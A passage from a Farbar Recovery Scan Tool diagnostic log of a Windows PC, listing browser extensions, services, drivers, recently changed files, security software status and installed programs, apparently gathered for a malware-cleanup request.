FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
S2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-14 23:38 - 2015-04-14 23:38 - 00000000 ____D () C:\Users\Angel\Desktop\FRST-OlderVersion
2015-04-13 15:11 - 2015-04-13 15:15 - 00035765 _____ () C:\Users\Angel\Desktop\Addition.txt
2015-04-13 15:09 - 2015-04-14 23:47 - 00019787 _____ () C:\Users\Angel\Desktop\FRST.txt
2015-04-13 15:09 - 2015-04-14 23:38 - 01136128 _____ (Farbar) C:\Users\Angel\Desktop\FRST.exe
2015-04-13 15:06 - 2015-04-13 15:06 - 00001063 _____ () C:\Malware.txt
2015-04-13 14:44 - 2015-04-13 14:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-13 14:41 - 2015-04-13 14:41 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\Angel\Downloads\mbam-setup-2.1.4.1018.exe
2015-04-13 14:32 - 2015-04-13 14:32 - 02217984 _____ () C:\Users\Angel\Downloads\adwcleaner_4.201.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Angel\Downloads\revosetup.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 00001059 _____ () C:\Users\Angel\Desktop\Revo Uninstaller.lnk
2015-04-13 14:19 - 2015-04-13 14:19 - 00000000 ____D () C:\Program Files\VS Revo Group
2015-04-12 20:26 - 2015-04-13 20:54 - 00007446 _____ () C:\Windows\PFRO.log
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-14 23:43 - 00446575 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-14 23:46 - 00000000 ____D () C:\FRST
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-13 14:34 - 00000000 ____D () C:\AdwCleaner
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-14 23:45 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-14 23:45 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-14 23:45 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-14 23:45 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-14 23:44 - 2014-09-28 20:26 - 00000008 __RSH () C:\ProgramData\ntuser.pol
2015-04-14 23:44 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-14 23:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-14 23:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-14 23:43 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-14 23:39 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2015-04-14 23:34 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-13 21:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-13 15:20 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Branding
2015-04-13 14:49 - 2014-09-29 09:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-13 14:44 - 2014-09-29 09:07 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-13 14:44 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
2015-03-17 06:15 - 2014-09-29 09:07 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-14 23:49
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 14-04-2015
Ran by Angel at 2015-04-14 23:48:06
Running from C:\Users\Angel\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ABBYY FineReader 6.0 Sprint (HKLM\...\{ACF60000-22B9-4CE9-98D6-2CCF359BAC07}) (Version: 6.00.1395.4552 - ABBYY Software House)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoImpression 5 (HKLM\...\{D433ABC3-0CD8-4BB0-B6A9-84501B4B47B7}) (Version:  - ArcSoft)
BitTornado 0.3.17 (HKLM\...\BitTornado) (Version: 0.3.17 - John Hoffman)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Business Tools Launcher (HKLM\...\{75685CA8-0B74-45BB-9C64-744A0FB79EDC}) (Version: 1.00.0000 - Dell Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
CreativeProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CreativeProjectsTemplates (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CueTour (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Destinations (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Devil May Cry 3: Special Edition (HKLM\...\Steam App 6550) (Version:  - CAPCOM Co., Ltd.)
Devil May Cry 4 (HKLM\...\Steam App 45700) (Version:  - Capcom)
Director (Version: 43.1.5.000 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
EPSON Attach To Email (HKLM\...\InstallShield_{20C45B32-5AB6-46A4-94EF-58950CAF05E5}) (Version: 1.01.0000 - SEIKO EPSON)
EPSON Attach To Email (Version: 1.01.0000 - SEIKO EPSON) Hidden
EPSON Copy Utility 3 (HKLM\...\{67EDD823-135A-4D59-87BD-950616D6E857}) (Version: 3.1.5.0 - )
EPSON Event Manager (HKLM\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 1.71.00 - )
EPSON File Manager (HKLM\...\{E86BC406-944E-41F6-ADE6-2C136734C96B}) (Version: 1.1.0.0 - )
EPSON Perf 3490 3590 Guide (HKLM\...\Silent Package Run-Time Sample) (Version:  - )
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON Scan Assistant (HKLM\...\{2A88F1BF-7041-4E42-84B1-6B4ACB83AC64}) (Version: 1.10.00 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
HP Image Zone 4.0 (HKLM\...\HP Photo & Imaging) (Version: 4.0 - HP)
HP Software Update (HKLM\...\{457791C5-D702-4143-A7B2-2744BE9573F2}) (Version: 2.0.39.20040212 - Hewlett-Packard)
HPSystemDiagnostics (Version: 1.5.0.0 - Your Company Name) Hidden
iCloud (HKLM\...\{79BD66B2-4DAE-4C3B-B08E-DC72E507C163}) (Version: 2.1.3.25 - Apple Inc.)
InstantShare (Version: 4.0.0.40 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{0A37EE62-9A58-420D-90CC-4E52153112EE}) (Version: 11.3.0.54 - Apple Inc.)
Java 7 Update 55 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java™ 6 Update 7 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
